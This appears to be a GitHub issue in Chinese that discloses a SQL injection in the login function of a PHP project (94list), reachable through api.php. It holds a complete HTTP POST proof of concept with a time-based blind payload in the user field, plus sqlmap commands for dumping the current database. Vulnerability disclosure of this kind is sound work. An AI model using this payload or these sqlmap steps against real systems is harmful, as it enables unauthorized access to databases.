-
Notifications
You must be signed in to change notification settings - Fork 319
Open
Description
漏洞成因:在function.php文件下login方法$user参数可控,攻击者可以通过构造恶意语句进行恶意操作。且在admin/index.php和api.php文件下均调用了login()函数。
漏洞复现:
POC:
POST /api.php HTTP/1.1
Host: 94list:83
Content-Length: 88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: application/json, text/plain, /
Content-Type: application/x-www-form-urlencoded
Origin: http://94list:83
Referer: http://94list:83/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r3ri1ru38uvdjegkruqr57aorb
Connection: keep-alive
type=login&user=1' AND (SELECT 9679 FROM (SELECT(SLEEP(5)))qzmH) AND 'bXOt'='bXOt&pass=1
sqlmap的poc
将上面POC内容改成type=login&user=1*&pass=1,放入x.txt文件下
python sqlmap.py -r x.txt --current-db --batch结果如下图:

Metadata
Metadata
Assignees
Labels
No labels